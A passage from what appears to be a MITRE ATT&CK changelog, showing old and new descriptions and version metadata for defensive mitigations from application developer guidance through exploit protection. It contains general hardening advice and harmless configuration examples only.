- Use Case: When malware like "Emotet" is detected, its signature (such as a specific file hash) matches a known database of malicious software, triggering an alert and allowing immediate quarantine of the infected file.
Heuristic-Based Detection:
- Implementation: Deploy heuristic algorithms that analyze behavior and characteristics of files and processes to identify potential malware, even if it doesn’t match a known signature.
- Use Case: If a program attempts to modify multiple critical system files or initiate suspicious network communications, heuristic analysis may flag it as potentially malicious, even if no specific malware signature is available.
Behavioral Detection (Behavior Prevention):
- Implementation: Use behavioral analysis to detect patterns of abnormal activities, such as unusual system calls, unauthorized file encryption, or attempts to escalate privileges.
- Use Case: Behavioral analysis can detect ransomware attacks early by identifying behavior like mass file encryption, even before a specific ransomware signature has been identified.
Real-Time Scanning:
- Implementation: Enable real-time scanning to automatically inspect files and network traffic for signs of malware as they are accessed, downloaded, or executed.
- Use Case: When a user downloads an email attachment, the antivirus solution scans the file in real-time, checking it against both signatures and heuristics to detect any malicious content before it can be opened.
Cloud-Assisted Threat Intelligence:
- Implementation: Use cloud-based threat intelligence to ensure the antivirus solution can access the latest malware definitions and real-time threat feeds from a global database of emerging threats.
- Use Case: Cloud-assisted antivirus solutions quickly identify newly discovered malware by cross-referencing against global threat databases, providing real-time protection against zero-day attacks.
**Tools for Implementation**:
- Endpoint Security Platforms: Use solutions such as EDR for comprehensive antivirus/antimalware protection across all systems.
- Centralized Management: Implement centralized antivirus management consoles that provide visibility into threat activity, enable policy enforcement, and automate updates.
- Behavioral Analysis Tools: Leverage solutions with advanced behavioral analysis capabilities to detect malicious activity patterns that don’t rely on known signatures. |
x_mitre_version | 1.1 | 1.2 |
[M1013] Application Developer Guidance
Current version: 1.2
Version changed from: 1.1 → 1.2
Old description:
This mitigation describes any guidance or training given to developers of applications to avoid introducing security weaknesses that an adversary may be able to take advantage of.
New description:
Application Developer Guidance focuses on providing developers with the knowledge, tools, and best practices needed to write secure code, reduce vulnerabilities, and implement secure design principles. By integrating security throughout the software development lifecycle (SDLC), this mitigation aims to prevent the introduction of exploitable weaknesses in applications, systems, and APIs. This mitigation can be implemented through the following measures:
Preventing SQL Injection (Secure Coding Practice):
- Implementation: Train developers to use parameterized queries or prepared statements instead of directly embedding user input into SQL queries.
- Use Case: A web application accepts user input to search a database. By sanitizing and validating user inputs, developers can prevent attackers from injecting malicious SQL commands.
Cross-Site Scripting (XSS) Mitigation:
- Implementation: Require developers to implement output encoding for all user-generated content displayed on a web page.
- Use Case: An e-commerce site allows users to leave product reviews. Properly encoding and escaping user inputs prevents malicious scripts from being executed in other users’ browsers.
Secure API Design:
- Implementation: Train developers to authenticate all API endpoints and avoid exposing sensitive information in API responses.
- Use Case: A mobile banking application uses APIs for account management. By enforcing token-based authentication for every API call, developers reduce the risk of unauthorized access.
Static Code Analysis in the Build Pipeline:
- Implementation: Incorporate tools into CI/CD pipelines to automatically scan for vulnerabilities during the build process.
- Use Case: A fintech company integrates static analysis tools to detect hardcoded credentials in their source code before deployment.
Threat Modeling in the Design Phase:
- Implementation: Use frameworks like STRIDE (Spoofing, Tampering, Repudiation, Information Disclosure, Denial of Service, Elevation of Privilege) to assess threats during application design.
- Use Case: Before launching a customer portal, a SaaS company identifies potential abuse cases, such as session hijacking, and designs mitigations like secure session management.
**Tools for Implementation**:
- Static Code Analysis Tools: Use tools that can scan for known vulnerabilities in source code.
- Dynamic Application Security Testing (DAST): Use tools like Burp Suite or OWASP ZAP to simulate runtime attacks and identify vulnerabilities.
- Secure Frameworks: Recommend secure-by-default frameworks (e.g., Django for Python, Spring Security for Java) that enforce security best practices.
Details
values_changed
STIX Field | Old value | New Value
---|---|---
modified | 2023-09-27 20:18:19.004000+00:00 | 2024-12-10 16:07:50.023000+00:00 |
description | This mitigation describes any guidance or training given to developers of applications to avoid introducing security weaknesses that an adversary may be able to take advantage of. | Application Developer Guidance focuses on providing developers with the knowledge, tools, and best practices needed to write secure code, reduce vulnerabilities, and implement secure design principles. By integrating security throughout the software development lifecycle (SDLC), this mitigation aims to prevent the introduction of exploitable weaknesses in applications, systems, and APIs. This mitigation can be implemented through the following measures:
Preventing SQL Injection (Secure Coding Practice):
- Implementation: Train developers to use parameterized queries or prepared statements instead of directly embedding user input into SQL queries.
- Use Case: A web application accepts user input to search a database. By sanitizing and validating user inputs, developers can prevent attackers from injecting malicious SQL commands.
Cross-Site Scripting (XSS) Mitigation:
- Implementation: Require developers to implement output encoding for all user-generated content displayed on a web page.
- Use Case: An e-commerce site allows users to leave product reviews. Properly encoding and escaping user inputs prevents malicious scripts from being executed in other users’ browsers.
Secure API Design:
- Implementation: Train developers to authenticate all API endpoints and avoid exposing sensitive information in API responses.
- Use Case: A mobile banking application uses APIs for account management. By enforcing token-based authentication for every API call, developers reduce the risk of unauthorized access.
Static Code Analysis in the Build Pipeline:
- Implementation: Incorporate tools into CI/CD pipelines to automatically scan for vulnerabilities during the build process.
- Use Case: A fintech company integrates static analysis tools to detect hardcoded credentials in their source code before deployment.
Threat Modeling in the Design Phase:
- Implementation: Use frameworks like STRIDE (Spoofing, Tampering, Repudiation, Information Disclosure, Denial of Service, Elevation of Privilege) to assess threats during application design.
- Use Case: Before launching a customer portal, a SaaS company identifies potential abuse cases, such as session hijacking, and designs mitigations like secure session management.
**Tools for Implementation**:
- Static Code Analysis Tools: Use tools that can scan for known vulnerabilities in source code.
- Dynamic Application Security Testing (DAST): Use tools like Burp Suite or OWASP ZAP to simulate runtime attacks and identify vulnerabilities.
- Secure Frameworks: Recommend secure-by-default frameworks (e.g., Django for Python, Spring Security for Java) that enforce security best practices. |
x_mitre_version | 1.1 | 1.2 |
[M1048] Application Isolation and Sandboxing
Current version: 1.2
Version changed from: 1.1 → 1.2
Old description:
Restrict execution of code to a virtual environment on or in transit to an endpoint system.
New description:
Application Isolation and Sandboxing refers to the technique of restricting the execution of code to a controlled and isolated environment (e.g., a virtual environment, container, or sandbox). This method prevents potentially malicious code from affecting the rest of the system or network by limiting access to sensitive resources and critical operations. The goal is to contain threats and minimize their impact. This mitigation can be implemented through the following measures:
Browser Sandboxing:
- Use Case: Implement browser sandboxing to isolate untrusted web content, preventing malicious web pages or scripts from accessing sensitive system files.
- Implementation: Use tools like Google Chrome's built-in sandbox or deploy solutions like Bromium to secure user web interactions.
Application Virtualization:
- Use Case: Deploy critical or high-risk applications in a virtualized environment to ensure any compromise does not affect the host system.
- Implementation: Use application virtualization platforms to run applications in isolated environments.
Email Attachment Sandboxing:
- Use Case: Route email attachments to a sandbox environment to detect and block malware before delivering emails to end-users.
- Implementation: Integrate security solutions with sandbox capabilities to analyze email attachments.
Endpoint Sandboxing:
- Use Case: Run all downloaded files and applications in a restricted environment to monitor their behavior for malicious activity.
- Implementation: Use endpoint protection tools for sandboxing at the endpoint level.
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
x_mitre_deprecated | | False |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-03-31 13:08:03.851000+00:00 | 2024-12-10 16:09:19.285000+00:00 |
description | Restrict execution of code to a virtual environment on or in transit to an endpoint system. | Application Isolation and Sandboxing refers to the technique of restricting the execution of code to a controlled and isolated environment (e.g., a virtual environment, container, or sandbox). This method prevents potentially malicious code from affecting the rest of the system or network by limiting access to sensitive resources and critical operations. The goal is to contain threats and minimize their impact. This mitigation can be implemented through the following measures:
Browser Sandboxing:
- Use Case: Implement browser sandboxing to isolate untrusted web content, preventing malicious web pages or scripts from accessing sensitive system files.
- Implementation: Use tools like Google Chrome's built-in sandbox or deploy solutions like Bromium to secure user web interactions.
Application Virtualization:
- Use Case: Deploy critical or high-risk applications in a virtualized environment to ensure any compromise does not affect the host system.
- Implementation: Use application virtualization platforms to run applications in isolated environments.
Email Attachment Sandboxing:
- Use Case: Route email attachments to a sandbox environment to detect and block malware before delivering emails to end-users.
- Implementation: Integrate security solutions with sandbox capabilities to analyze email attachments.
Endpoint Sandboxing:
- Use Case: Run all downloaded files and applications in a restricted environment to monitor their behavior for malicious activity.
- Implementation: Use endpoint protection tools for sandboxing at the endpoint level. |
x_mitre_version | 1.1 | 1.2 |
[M1047] Audit
Current version: 1.3
Version changed from: 1.2 → 1.3
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-10-17 18:53:08.707000+00:00 | 2024-12-10 16:28:27.046000+00:00 |
description | Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses. | Auditing is the process of recording activity and systematically reviewing and analyzing the activity and system configurations. The primary purpose of auditing is to detect anomalies and identify potential threats or weaknesses in the environment. Proper auditing configurations can also help to meet compliance requirements. The process of auditing encompasses regular analysis of user behaviors and system logs in support of proactive security measures.
Auditing is applicable to all systems used within an organization, from the front door of a building to accessing a file on a fileserver. It is considered more critical for regulated industries such as healthcare, finance, and government, where compliance requirements demand stringent tracking of user and system activities. This mitigation can be implemented through the following measures:
System Audit:
- Use Case: Regularly assess system configurations to ensure compliance with organizational security policies.
- Implementation: Use tools to scan for deviations from established benchmarks.
Permission Audits:
- Use Case: Review file and folder permissions to minimize the risk of unauthorized access or privilege escalation.
- Implementation: Run access reviews to identify users or groups with excessive permissions.
Software Audits:
- Use Case: Identify outdated, unsupported, or insecure software that could serve as an attack vector.
- Implementation: Use inventory and vulnerability scanning tools to detect outdated versions and recommend secure alternatives.
Configuration Audits:
- Use Case: Evaluate system and network configurations to ensure secure settings (e.g., disabled SMBv1, enabled MFA).
- Implementation: Implement automated configuration scanning tools like SCAP (Security Content Automation Protocol) to identify non-compliant systems.
Network Audits:
- Use Case: Examine network traffic, firewall rules, and endpoint communications to identify unauthorized or insecure connections.
- Implementation: Utilize tools such as Wireshark or Zeek to monitor and log suspicious network behavior. |
x_mitre_version | 1.2 | 1.3 |
[M1040] Behavior Prevention on Endpoint
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
x_mitre_deprecated | | False |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2019-06-11 16:43:05.712000+00:00 | 2024-12-10 16:29:44.429000+00:00 |
description | Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior. | Behavior Prevention on Endpoint refers to the use of technologies and strategies to detect and block potentially malicious activities by analyzing the behavior of processes, files, API calls, and other endpoint events. Rather than relying solely on known signatures, this approach leverages heuristics, machine learning, and real-time monitoring to identify anomalous patterns indicative of an attack. This mitigation can be implemented through the following measures:
Suspicious Process Behavior:
- Implementation: Use Endpoint Detection and Response (EDR) tools to monitor and block processes exhibiting unusual behavior, such as privilege escalation attempts.
- Use Case: An attacker uses a known vulnerability to spawn a privileged process from a user-level application. The endpoint tool detects the abnormal parent-child process relationship and blocks the action.
Unauthorized File Access:
- Implementation: Leverage Data Loss Prevention (DLP) or endpoint tools to block processes attempting to access sensitive files without proper authorization.
- Use Case: A process tries to read or modify a sensitive file located in a restricted directory, such as /etc/shadow on Linux or the SAM registry hive on Windows. The endpoint tool identifies this anomalous behavior and prevents it.
Abnormal API Calls:
- Implementation: Implement runtime analysis tools to monitor API calls and block those associated with malicious activities.
- Use Case: A process dynamically injects itself into another process to hijack its execution. The endpoint detects the abnormal use of APIs like `OpenProcess` and `WriteProcessMemory` and terminates the offending process.
Exploit Prevention:
- Implementation: Use behavioral exploit prevention tools to detect and block exploits attempting to gain unauthorized access.
- Use Case: A buffer overflow exploit is launched against a vulnerable application. The endpoint detects the anomalous memory write operation and halts the process. |
x_mitre_version | 1.0 | 1.1 |
[M1046] Boot Integrity
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
x_mitre_deprecated | | False |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-05-19 12:28:50.603000+00:00 | 2024-12-10 18:48:36.517000+00:00 |
description | Use secure methods to boot a system and verify the integrity of the operating system and loading mechanisms. | Boot Integrity ensures that a system starts securely by verifying the integrity of its boot process, operating system, and associated components. This mitigation focuses on leveraging secure boot mechanisms, hardware-rooted trust, and runtime integrity checks to prevent tampering during the boot sequence. It is designed to thwart adversaries attempting to modify system firmware, bootloaders, or critical OS components. This mitigation can be implemented through the following measures:
Implementation of Secure Boot:
- Implementation: Enable UEFI Secure Boot on all systems and configure it to allow only signed bootloaders and operating systems.
- Use Case: An adversary attempts to replace the system’s bootloader with a malicious version to gain persistence. Secure Boot prevents the untrusted bootloader from executing, halting the attack.
Utilization of TPMs:
- Implementation: Configure systems to use TPM-based attestation for boot integrity, ensuring that any modification to the firmware, bootloader, or OS is detected.
- Use Case: A compromised firmware component alters the boot sequence. The TPM detects the change and triggers an alert, allowing the organization to respond before further damage.
Enable Bootloader Passwords:
- Implementation: Protect BIOS/UEFI settings with a strong password and limit physical access to devices.
- Use Case: An attacker with physical access attempts to disable Secure Boot or modify the boot sequence. The password prevents unauthorized changes.
Runtime Integrity Monitoring:
- Implementation: Deploy solutions to verify the integrity of critical files and processes after boot.
- Use Case: A malware infection modifies kernel modules post-boot. Runtime integrity monitoring detects the modification and prevents the malicious module from loading. |
x_mitre_version | 1.0 | 1.1 |
[M1045] Code Signing
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
x_mitre_deprecated | | False |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-05-20 13:12:02.881000+00:00 | 2024-12-10 18:52:40.747000+00:00 |
description | Enforce binary and application integrity with digital signature verification to prevent untrusted code from executing. | Code Signing is a security process that ensures the authenticity and integrity of software by digitally signing executables, scripts, and other code artifacts. It prevents untrusted or malicious code from executing by verifying the digital signatures against trusted sources. Code signing protects against tampering, impersonation, and distribution of unauthorized or malicious software, forming a critical defense against supply chain and software exploitation attacks. This mitigation can be implemented through the following measures:
Enforce Signed Code Execution:
- Implementation: Configure operating systems (e.g., Windows with AppLocker or Linux with Secure Boot) to allow only signed code to execute.
- Use Case: Prevent the execution of malicious PowerShell scripts by requiring all scripts to be signed with a trusted certificate.
Vendor-Signed Driver Enforcement:
- Implementation: Enable kernel-mode code signing to ensure that only drivers signed by trusted vendors can be loaded.
- Use Case: A malicious driver attempting to modify system memory fails to load because it lacks a valid signature.
Certificate Revocation Management:
- Implementation: Use Online Certificate Status Protocol (OCSP) or Certificate Revocation Lists (CRLs) to block certificates associated with compromised or deprecated code.
- Use Case: A compromised certificate used to sign a malicious update is revoked, preventing further execution of the software.
Third-Party Software Verification:
- Implementation: Require software from external vendors to be signed with valid certificates before deployment.
- Use Case: An organization only deploys signed and verified third-party software to prevent supply chain attacks.
Script Integrity in CI/CD Pipelines:
- Implementation: Integrate code signing into CI/CD pipelines to sign and verify code artifacts before production release.
- Use Case: A software company ensures that all production builds are signed, preventing tampered builds from reaching customers.
**Key Components of Code Signing**
- Digital Signature Verification: Verifies the authenticity of code by ensuring it was signed by a trusted entity.
- Certificate Management: Uses Public Key Infrastructure (PKI) to manage signing certificates and revocation lists.
- Enforced Policy for Unsigned Code: Prevents the execution of unsigned or untrusted binaries and scripts.
- Hash Integrity Check: Confirms that code has not been altered since signing by comparing cryptographic hashes. |
x_mitre_version | 1.1 | 1.2 |
[M1043] Credential Access Protection
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-10-17 18:53:26.963000+00:00 | 2024-12-10 18:55:27.646000+00:00 |
description | Use capabilities to prevent successful credential access by adversaries; including blocking forms of credential dumping. | Credential Access Protection focuses on implementing measures to prevent adversaries from obtaining credentials, such as passwords, hashes, tokens, or keys, that could be used for unauthorized access. This involves restricting access to credential storage mechanisms, hardening configurations to block credential dumping methods, and using monitoring tools to detect suspicious credential-related activity. This mitigation can be implemented through the following measures:
Restrict Access to Credential Storage:
- Use Case: Prevent adversaries from accessing the SAM (Security Account Manager) database on Windows systems.
- Implementation: Enforce least privilege principles and restrict administrative access to credential stores such as `C:\Windows\System32\config\SAM`.
Use Credential Guard:
- Use Case: Isolate LSASS (Local Security Authority Subsystem Service) memory to prevent credential dumping.
- Implementation: Enable Windows Defender Credential Guard on enterprise endpoints to isolate secrets and protect them from unauthorized access.
Monitor for Credential Dumping Tools:
- Use Case: Detect and block known tools like Mimikatz or Windows Credential Editor.
- Implementation: Flag suspicious process behavior related to credential dumping.
Disable Cached Credentials:
- Use Case: Prevent adversaries from exploiting cached credentials on endpoints.
- Implementation: Configure group policy to reduce or eliminate the use of cached credentials (e.g., set Interactive logon: Number of previous logons to cache to 0).
Enable Secure Boot and Memory Protections:
- Use Case: Prevent memory-based attacks used to extract credentials.
- Implementation: Configure Secure Boot and enforce hardware-based security features like DEP (Data Execution Prevention) and ASLR (Address Space Layout Randomization). |
x_mitre_version | 1.1 | 1.2 |
[M1053] Data Backup
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
x_mitre_deprecated | | False |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-03-31 13:11:28.201000+00:00 | 2024-12-10 15:32:14.846000+00:00 |
description | Take and store data backups from end user systems and critical servers. Ensure backup and storage systems are hardened and kept separate from the corporate network to prevent compromise. | Data Backup involves taking and securely storing backups of data from end-user systems and critical servers. It ensures that data remains available in the event of system compromise, ransomware attacks, or other disruptions. Backup processes should include hardening backup systems, implementing secure storage solutions, and keeping backups isolated from the corporate network to prevent compromise during active incidents. This mitigation can be implemented through the following measures:
Regular Backup Scheduling:
- Use Case: Ensure timely and consistent backups of critical data.
- Implementation: Schedule daily incremental backups and weekly full backups for all critical servers and systems.
Immutable Backups:
- Use Case: Protect backups from modification or deletion, even by attackers.
- Implementation: Use write-once-read-many (WORM) storage for backups, preventing ransomware from encrypting or deleting backup files.
Backup Encryption:
- Use Case: Protect data integrity and confidentiality during transit and storage.
- Implementation: Encrypt backups using strong encryption protocols (e.g., AES-256) before storing them in local, cloud, or remote locations.
Offsite Backup Storage:
- Use Case: Ensure data availability during physical disasters or onsite breaches.
- Implementation: Use cloud-based solutions like AWS S3, Azure Backup, or physical offsite storage to maintain a copy of critical data.
Backup Testing:
- Use Case: Validate backup integrity and ensure recoverability.
- Implementation: Regularly test data restoration processes to ensure that backups are not corrupted and can be recovered quickly. |
x_mitre_version | 1.1 | 1.2 |
[M1057] Data Loss Prevention
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
x_mitre_deprecated | | False |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-08-30 15:00:10.680000+00:00 | 2024-12-10 19:10:54.180000+00:00 |
description | Use a data loss prevention (DLP) strategy to categorize sensitive data, identify data formats indicative of personal identifiable information (PII), and restrict exfiltration of sensitive data.(Citation: PurpleSec Data Loss Prevention) | Data Loss Prevention (DLP) involves implementing strategies and technologies to identify, categorize, monitor, and control the movement of sensitive data within an organization. This includes protecting data formats indicative of Personally Identifiable Information (PII), intellectual property, or financial data from unauthorized access, transmission, or exfiltration. DLP solutions integrate with network, endpoint, and cloud platforms to enforce security policies and prevent accidental or malicious data leaks. (Citation: PurpleSec Data Loss Prevention) This mitigation can be implemented through the following measures:
Sensitive Data Categorization:
- Use Case: Identify and classify data based on sensitivity (e.g., PII, financial data, trade secrets).
- Implementation: Use DLP solutions to scan and tag files containing sensitive information using predefined patterns, such as Social Security Numbers or credit card details.
Exfiltration Restrictions:
- Use Case: Prevent unauthorized transmission of sensitive data.
- Implementation: Enforce policies to block unapproved email attachments, unauthorized USB usage, or unencrypted data uploads to cloud storage.
Data-in-Transit Monitoring:
- Use Case: Detect and prevent the transmission of sensitive data over unapproved channels.
- Implementation: Deploy network-based DLP tools to inspect outbound traffic for sensitive content (e.g., financial records or PII) and block unapproved transmissions.
Endpoint Data Protection:
- Use Case: Monitor and control sensitive data usage on endpoints.
- Implementation: Use endpoint-based DLP agents to block copy-paste actions of sensitive data and unauthorized printing or file sharing.
Cloud Data Security:
- Use Case: Protect data stored in cloud platforms.
- Implementation: Integrate DLP with cloud storage platforms like Google Drive, OneDrive, or AWS to monitor and restrict sensitive data sharing or downloads. |
x_mitre_version | 1.0 | 1.1 |
[M1042] Disable or Remove Feature or Program
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
x_mitre_deprecated | | False |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-03-31 13:12:04.776000+00:00 | 2024-12-10 19:21:06.027000+00:00 |
description | Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries. | Disable or remove unnecessary and potentially vulnerable software, features, or services to reduce the attack surface and prevent abuse by adversaries. This involves identifying software or features that are no longer needed or that could be exploited and ensuring they are either removed or properly disabled. This mitigation can be implemented through the following measures:
Remove Legacy Software:
- Use Case: Disable or remove older versions of software that no longer receive updates or security patches (e.g., legacy Java, Adobe Flash).
- Implementation: A company removes Flash Player from all employee systems after it has reached its end-of-life date.
Disable Unused Features:
- Use Case: Turn off unnecessary operating system features like SMBv1, Telnet, or RDP if they are not required.
- Implementation: Disable SMBv1 in a Windows environment to mitigate vulnerabilities like EternalBlue.
Control Applications Installed by Users:
- Use Case: Prevent users from installing unauthorized software via group policies or other management tools.
- Implementation: Block user installations of unauthorized file-sharing applications (e.g., BitTorrent clients) in an enterprise environment.
Remove Unnecessary Services:
- Use Case: Identify and disable unnecessary default services running on endpoints, servers, or network devices.
- Implementation: Disable unused administrative shares (e.g., C$, ADMIN$) on workstations.
Restrict Add-ons and Plugins:
- Use Case: Remove or disable browser plugins and add-ons that are not needed for business purposes.
- Implementation: Disable Java and ActiveX plugins in web browsers to prevent drive-by attacks. |
x_mitre_version | 1.1 | 1.2 |
[M1055] Do Not Mitigate
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
x_mitre_deprecated | | False |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2019-07-23 14:44:24.727000+00:00 | 2024-12-10 19:25:57.870000+00:00 |
description | This category is to associate techniques that mitigation might increase risk of compromise and therefore mitigation is not recommended. | The Do Not Mitigate category highlights scenarios where attempting to mitigate a specific technique may inadvertently increase the organization's security risk or operational instability. This could happen due to the complexity of the system, the integration of critical processes, or the potential for introducing new vulnerabilities. Instead of direct mitigation, these situations may call for alternative strategies such as detection, monitoring, or response. The Do Not Mitigate category underscores the importance of assessing the trade-offs between mitigation efforts and overall system integrity. This mitigation can be implemented through the following measures:
Complex Systems Where Mitigation is Risky:
- Interpretation: In certain systems, direct mitigation could introduce new risks, especially if the system is highly interconnected or complex, such as in legacy industrial control systems (ICS). Patching or modifying these systems could result in unplanned downtime, disruptions, or even safety risks.
- Use Case: In a power grid control system, attempting to patch or disable certain services related to device communications might disrupt critical operations, leading to unintended service outages.
Risk of Reducing Security Coverage:
- Interpretation: In some cases, mitigating a technique might reduce the visibility or effectiveness of other security controls, limiting an organization’s ability to detect broader attacks.
- Use Case: Disabling script execution on a web server to mitigate potential PowerShell-based attacks could interfere with legitimate administrative operations that rely on scripting, while attackers may still find alternate ways to execute code.
Introduction of New Vulnerabilities:
- Interpretation: In highly sensitive or tightly controlled environments, implementing certain mitigations might create vulnerabilities in other parts of the system. For instance, disabling default security mechanisms in an attempt to resolve compatibility issues may open the system to exploitation.
- Use Case: Disabling certificate validation to resolve internal communication issues in a secure environment could lead to man-in-the-middle attacks, creating a greater vulnerability than the original problem.
Negative Impact on Performance and Availability:
- Interpretation: Mitigations that involve removing or restricting system functionalities can have unintended consequences for system performance and availability. Some mitigations, while effective at blocking certain attacks, may introduce performance bottlenecks or compromise essential operations.
- Use Case: Implementing high levels of encryption to mitigate data theft might result in significant performance degradation in systems handling large volumes of real-time transactions. |
x_mitre_version | 1.0 | 1.1 |
[M1041] Encrypt Sensitive Information
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
x_mitre_deprecated | | False |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2019-06-11 16:43:44.834000+00:00 | 2025-04-02 17:28:57.029000+00:00 |
description | Protect sensitive information with strong encryption. | Protect sensitive information at rest, in transit, and during processing by using strong encryption algorithms. Encryption ensures the confidentiality and integrity of data, preventing unauthorized access or tampering. This mitigation can be implemented through the following measures:
Encrypt Data at Rest:
- Use Case: Use full-disk encryption or file-level encryption to secure sensitive data stored on devices.
- Implementation: Implement BitLocker for Windows systems or FileVault for macOS devices to encrypt hard drives.
Encrypt Data in Transit:
- Use Case: Use secure communication protocols (e.g., TLS, HTTPS) to encrypt sensitive data as it travels over networks.
- Implementation: Enable HTTPS for all web applications and configure mail servers to enforce STARTTLS for email encryption.
Encrypt Backups:
- Use Case: Ensure that backup data is encrypted both during storage and transfer to prevent unauthorized access.
- Implementation: Encrypt cloud backups using AES-256 before uploading them to Amazon S3 or Google Cloud.
Encrypt Application Secrets:
- Use Case: Store sensitive credentials, API keys, and configuration files in encrypted vaults.
- Implementation: Use HashiCorp Vault or AWS Secrets Manager to manage and encrypt secrets.
Database Encryption:
- Use Case: Enable Transparent Data Encryption (TDE) or column-level encryption in database management systems.
- Implementation: Use MySQL’s built-in encryption features to encrypt sensitive database fields such as social security numbers. |
x_mitre_version | 1.0 | 1.1 |
[M1039] Environment Variable Permissions
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
x_mitre_deprecated | | False |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2019-06-11 16:40:14.543000+00:00 | 2024-12-11 17:54:05.697000+00:00 |
description | Prevent modification of environment variables by unauthorized users and groups. | Restrict the modification of environment variables to authorized users and processes by enforcing strict permissions and policies. This ensures the integrity of environment variables, preventing adversaries from abusing or altering them for malicious purposes. This mitigation can be implemented through the following measures:
Restrict Write Access:
- Use Case: Set file system-level permissions to restrict access to environment variable configuration files (e.g., `.bashrc`, `.bash_profile`, `.zshrc`, `systemd` service files).
- Implementation: Configure `/etc/environment` or `/etc/profile` on Linux systems to only allow root or administrators to modify the file.
Secure Access Controls:
- Use Case: Limit access to environment variable settings in application deployment tools or CI/CD pipelines to authorized personnel.
- Implementation: Use role-based access control (RBAC) in tools like Jenkins or GitLab to ensure only specific users can modify environment variables.
Restrict Process Scope:
- Use Case: Configure policies to ensure environment variables are only accessible to the processes they are explicitly intended for.
- Implementation: Use containerized environments like Docker to isolate environment variables to specific containers and ensure they are not inherited by other processes.
Audit Environment Variable Changes:
- Use Case: Enable logging for changes to critical environment variables.
- Implementation: Use `auditd` on Linux to monitor changes to files like `/etc/environment` or application-specific environment files. |
x_mitre_version | 1.0 | 1.1 |
[M1038] Execution Prevention
Current version: 1.3
Version changed from: 1.2 → 1.3
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-10-17 18:53:48.791000+00:00 | 2024-12-11 18:10:27.976000+00:00 |
description | Block execution of code on a system through application control, and/or script blocking. | Prevent the execution of unauthorized or malicious code on systems by implementing application control, script blocking, and other execution prevention mechanisms. This ensures that only trusted and authorized code is executed, reducing the risk of malware and unauthorized actions. This mitigation can be implemented through the following measures:
Application Control:
- Use Case: Use tools like AppLocker or Windows Defender Application Control (WDAC) to create whitelists of authorized applications and block unauthorized ones. On Linux, use tools like SELinux or AppArmor to define mandatory access control policies for application execution.
- Implementation: Allow only digitally signed or pre-approved applications to execute on servers and endpoints. (e.g., `New-AppLockerPolicy -PolicyType Enforced -FilePath "C:\Policies\AppLocker.xml"`)
Script Blocking:
- Use Case: Use script control mechanisms to block unauthorized execution of scripts, such as PowerShell or JavaScript. Web Browsers: Use browser extensions or settings to block JavaScript execution from untrusted sources.
- Implementation: Configure PowerShell to enforce Constrained Language Mode for non-administrator users. (e.g., `Set-ExecutionPolicy AllSigned`)
Executable Blocking:
- Use Case: Prevent execution of binaries from suspicious locations, such as `%TEMP%` or `%APPDATA%` directories.
- Implementation: Block execution of `.exe`, `.bat`, or `.ps1` files from user-writable directories.
Dynamic Analysis Prevention:
- Use Case: Use behavior-based execution prevention tools to identify and block malicious activity in real time.
- Implementation: Employ EDR solutions that analyze runtime behavior and block suspicious code execution. |
x_mitre_version | 1.2 | 1.3 |
[M1050] Exploit Protection
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
x_mitre_deprecated | | False |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-06-20 20:22:55.938000+00:00 | 2024-12-11 19:22:37.296000+00:00 |
description | Use capabilities to detect and block conditions that may lead to or be indicative of a software exploit occurring. | Deploy capabilities that detect, block, and mitigate conditions indicative of software exploits. These capabilities aim to prevent exploitation by addressing vulnerabilities, monitoring anomalous behaviors, and applying exploit-mitigation techniques to harden systems and software.
Operating System Exploit Protections:
- Use Case: Enable built-in exploit protection features provided by modern operating systems, such as Microsoft's Exploit Protection, which includes techniques like Data Execution Prevention (DEP), Address Space Layout Randomization (ASLR), and Control Flow Guard (CFG).
- Implementation: Enforce DEP for all programs and enable ASLR to randomize memory addresses used by system and application processes. Windows: Configure Exploit Protection through the Windows Security app or deploy settings via Group Policy.
